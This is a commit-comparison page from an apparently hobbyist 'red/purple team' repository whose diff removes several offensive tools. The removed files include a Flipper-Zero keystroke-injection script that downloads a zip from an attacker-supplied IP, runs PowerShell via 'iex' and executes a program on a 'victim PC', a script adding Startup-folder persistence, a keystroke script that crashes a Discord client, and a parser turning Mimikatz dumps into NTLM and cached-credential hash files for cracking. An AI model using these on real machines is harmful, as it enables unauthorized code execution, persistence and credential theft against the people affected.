0xvoodoo/Misadventures
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: 0xvoodoo/Misadventures:katz2
Branches Tags
0xvoodoo/Misadventures:master 0xvoodoo/Misadventures:katz2 0xvoodoo/Misadventures:Goose_DropperV2.1 0xvoodoo/Misadventures:Kill_Discord 0xvoodoo/Misadventures:v2.0_bugfix_1 0xvoodoo/Misadventures:GooseDropper_V2.0 0xvoodoo/Misadventures:main
..
pull from: 0xvoodoo/Misadventures:main
Branches Tags
0xvoodoo/Misadventures:master 0xvoodoo/Misadventures:katz2 0xvoodoo/Misadventures:Goose_DropperV2.1 0xvoodoo/Misadventures:Kill_Discord 0xvoodoo/Misadventures:v2.0_bugfix_1 0xvoodoo/Misadventures:GooseDropper_V2.0 0xvoodoo/Misadventures:main

1 Commits
katz2 .. main

Author SHA1 Message Date
Malachi a8f16b38ad Initial commit 2023-10-29 01:09:20 -06:00
11 changed files with 1 additions and 226 deletions
Expand all files Collapse all files
Duckyscripts/GooseDropper/GooseDropper.txt
-23
View File
@@ -1,23 +0,0 @@
REM TITLE GooseDropper
REM AUTHOR Fr3ki
REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
DELAY 500
GUI r
DELAY 500
STRING powershell wget YOUR_IP/ZIP -OutFile $ENV:Temp/Update.zip
ENTER
DELAY 8000
GUI r
DELAY 500
STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update
ENTER
DELAY 3000
GUI r
DELAY 500
STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
ENTER
DELAY 1000
GUI r
DELAY 500
STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
ENTER
Duckyscripts/GooseDropper/PersistentGoose.ps1
-6
View File
@@ -1,6 +0,0 @@
$WScriptShell = New-Object -ComObject WScript.Shell
$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
Duckyscripts/GooseDropper/README.md
-25
View File
@@ -1,25 +0,0 @@
**======= Goose Dropper v2.0 ========**
This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE**
--------------------------------------------------------------------------------------------------------------
**Important Notes:**
Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
**=== v2.0 Notes ==**
Added persistence via a PowerShell script that makes a shortcut in the startup folder.
Revamped updater with more options and better dialogue.
Bugfixes to ensure payloads get delivered successfully.
**=== v2.1 Notes ==**
Simplified configurators to remove unnecessary complexity
Added Windows auto-configuration tool.
Duckyscripts/GooseDropper/linux_setup.sh
-31
View File
@@ -1,31 +0,0 @@
#!/bin/bash
IP=$1
ZIP=$2
PERSIST=$3
#Ensure required arguments are not empty
if [ "${IP}" == "" ] | [ "${ZIP}" == "" ];
then
echo "Usage: sh linux_setup.sh <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
exit
fi
#Check for help command
if [ "${IP,,}" == "-h" ] | [ "${IP,,}" == "help" ];
then
echo "Usage: sh linux_setup.sh <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
exit
fi
#Replace placeholders with provided values
sed -i "s/YOUR_IP/$IP/" GooseDropper.txt
sed -i "s/ZIP/$ZIP/" GooseDropper.txt
#Remove persistance if desired
if [ "${PERSIST,,}" == "n" ];
then
sed -i "15d;16d;17d;18d;19d" GooseDropper.txt
else
break
fi
Duckyscripts/GooseDropper/windows_setup.ps1
-30
View File
@@ -1,30 +0,0 @@
param (
[string]$HELP,
[string]$IP,
[string]$ZIP,
[string]$PERSIST
)
# Ensure required arguments are not empty
if (-not $IP -or -not $ZIP) {
Write-Host "Usage: .\windows_setup.ps1 <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
exit
}
# Check for help command
if ($HELP) {
Write-Host "Usage: .\windows_setup.ps1 <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
exit
}
# Replace placeholders with provided values
(Get-Content "GooseDropper.txt") | ForEach-Object { $_ -replace 'YOUR_IP', $IP -replace 'ZIP', $ZIP } | Set-Content "GooseDropper.txt"
# Remove persistence if desired
if ($PERSIST.ToLower() -eq "n") {
$lines = Get-Content "GooseDropper.txt"
$lines = $lines[0..14] + $lines[19..($lines.Length - 1)]
Set-Content "GooseDropper.txt" $lines
} else {
break
}
Duckyscripts/Kill_Discord/README.txt
-12
View File
@@ -1,12 +0,0 @@
# This specific "Exploit" has been patched and is no-longer usable.
---
Kill_Discord is a duckyscript that does exactly what the name implies.
As of April 2024 the string "http://./\<#0>: ://./<#0>" without the quotes will crash your Discord client when pasted into any message box.
This script opens Discord on the target machine and pastes that string into the first available text box.
Just to reitterate this crashes the Discord client of the SENDER, hence the need for a duckyscript.
As always, don't be a skid, and only use these scripts on devices which you are expresely authorized to use them on. I am not liable for any unauthorized usage or damage caused by the usage of this tool.
Duckyscripts/Kill_Discord/kill_discord.txt
-12
View File
@@ -1,12 +0,0 @@
DELAY 500
GUI r
DELAY 500
STRING C:\ProgramData\%USERNAME%\Discord\Update.exe --processStart Discord.exe
DELAY 500
ENTER
DELAY 2000
CTRL k
DELAY 100
ENTER
DELAY 500
STRING http://./\<#0>: ://./<#0>
LICENSE.txt → LICENSE
View File
README.md
+1 -5
View File
@@ -1,6 +1,2 @@
# Misadventures
This is a set of Red and Purple team tools I've developed, mostly just for fun, but some may find them useful.
Feel free to leave tips, comments, or suggestion in the comments, on my website at https://fr3ki.xyz or my twitter @Fr3ki_
Licence: https://www.gnu.org/licenses/gpl-3.0.html
Red/Purple-Team tools
katz2/README.md
-14
View File
@@ -1,14 +0,0 @@
# Katz^2
Katz Squared is a small python parser for Mimikatz log files, allowing for username/hash combos to be written to txt files, ready for use with Hashcat (you get the joke yet?) or John.
---
Usage: `katz2.py [-h] -f/--file -m/--mode`
-
**Modes:**
- logonpasswords - Used for files containing the output of the mimikatz module of the same name.
- cache -- Used for files containing the output of the lsadump::cache mimikatz module
---
**License:**
GPLv3 as all good software should be.
katz2/katz2.py
-68
View File
@@ -1,68 +0,0 @@
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", help="Mimikatz output file", required=True)
parser.add_argument("-m", "--mode", help="Mimikatz mode used to obtain the output logonpasswords|cache", required=True)
args = parser.parse_args()
def dump(creds):
if isinstance(creds, list) and len(creds) >= 2:
username = creds[0]
hsh = creds[1]
dumpfile = username+".txt"
with open(dumpfile, "w+") as df:
df.write(hsh)
else:
pass
def sekurlsa():
filename = args.file
creds = []
with open(filename) as f:
for line in f:
if "authentication" in line.lower():
dump(creds)
creds = []
elif "username" in line.lower():
username = line.split(":")[1].strip()
if username.lower() in creds or username.lower() == "(null)":
pass
else:
creds.append(username.lower())
elif "ntlm" in line.lower():
ntlm = line.strip().split(":")[1].strip()
if ntlm in creds:
pass
else:
creds.append(ntlm)
def cache():
filename = args.file
creds = []
with open(filename) as f:
for line in f:
if "nl$" in line.lower():
print(creds)
dump(creds)
creds = []
elif "user" in line.lower():
username = line.split(":")[1].strip()
if username.lower() in creds or username.lower() == "(null)":
pass
else:
creds.append(username.lower())
elif "mscachev2" in line.lower():
mscache = line.strip().split(":")[1].strip()
if mscache in creds:
pass
else:
creds.append(mscache)
print("[+] Credential pairs written to disk")
if __name__ == "__main__":
match args.mode:
case "logonpasswords":
sekurlsa()
case "cache":
cache()